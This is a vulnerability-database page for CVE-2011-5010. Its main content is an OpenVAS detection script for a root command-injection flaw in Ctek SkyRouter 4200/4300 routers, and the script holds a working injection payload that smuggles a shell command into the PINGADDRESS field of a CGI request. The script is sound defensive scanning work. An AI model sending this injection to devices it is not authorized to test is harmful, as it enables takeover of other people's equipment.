| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2011-5010 | 30 Nov 201100:00 | – | circl | |
| CVE-2011-5010 | 25 Dec 201101:00 | – | cve | |
| CVE-2011-5010 | 25 Dec 201101:00 | – | cvelist | |
| CTEK SkyRouter 4200 and 4300 Command Execution | 29 Nov 201109:30 | – | metasploit | |
| CVE-2011-5010 | 25 Dec 201101:55 | – | nvd | |
| Ctek SkyRouter 4200 and 4300 Series Routers Remote Arbitrary Command Execution Vulnerability | 25 Apr 201200:00 | – | openvas | |
| Deserialization of untrusted data | 25 Dec 201101:55 | – | prion | |
| VulnCheck KEV: CVE-2011-5010 | 1 Dec 202000:00 | – | vulncheck_kev |
| Source | Link |
|---|---|
| ctekproducts | www.ctekproducts.com/ |
| securityfocus | www.securityfocus.com/bid/50867 |
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_ctek_skyrouter_50867.nasl 5841 2017-04-03 12:46:41Z cfi $
#
# Ctek SkyRouter 4200 and 4300 Series Routers Remote Arbitrary Command Execution Vulnerability
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_summary = "Ctek SkyRouter 4200 and 4300 series routers are prone to a remote
arbitrary command-execution vulnerability because it fails to
adequately sanitize user-supplied input.
Remote attackers can exploit this issue to execute arbitrary shell
commands with superuser privileges, which may facilitate a complete
compromise of the affected device.";
if (description)
{
script_id(103479);
script_bugtraq_id(50867);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_version("$Revision: 5841 $");
script_cve_id("CVE-2011-5010");
script_name("Ctek SkyRouter 4200 and 4300 Series Routers Remote Arbitrary Command Execution Vulnerability");
script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/50867");
script_xref(name : "URL" , value : "http://www.ctekproducts.com/");
script_tag(name:"last_modification", value:"$Date: 2017-04-03 14:46:41 +0200 (Mon, 03 Apr 2017) $");
script_tag(name:"creation_date", value:"2012-04-25 15:07:13 +0200 (Wed, 25 Apr 2012)");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_family("Web application abuses");
script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
script_dependencies("find_service.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
req = http_get(item:"/apps/a3/cfg_ethping.cgi", port:port);
res = http_send_recv(port:port, data:req);
if("Ctek" >!< res && "SkyRouter" >!< res)exit(0);
host = http_host_name(port:port);
req = string("POST /apps/a3/cfg_ethping.cgi HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"User-Agent: ", OPENVAS_HTTP_USER_AGENT, "\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: 63\r\n",
"\r\n",
"MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;id+%26");
res = http_send_recv(port:port, data:req);
if(egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res)) {
security_message(port:port);
exit(0);
}
exit(0);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation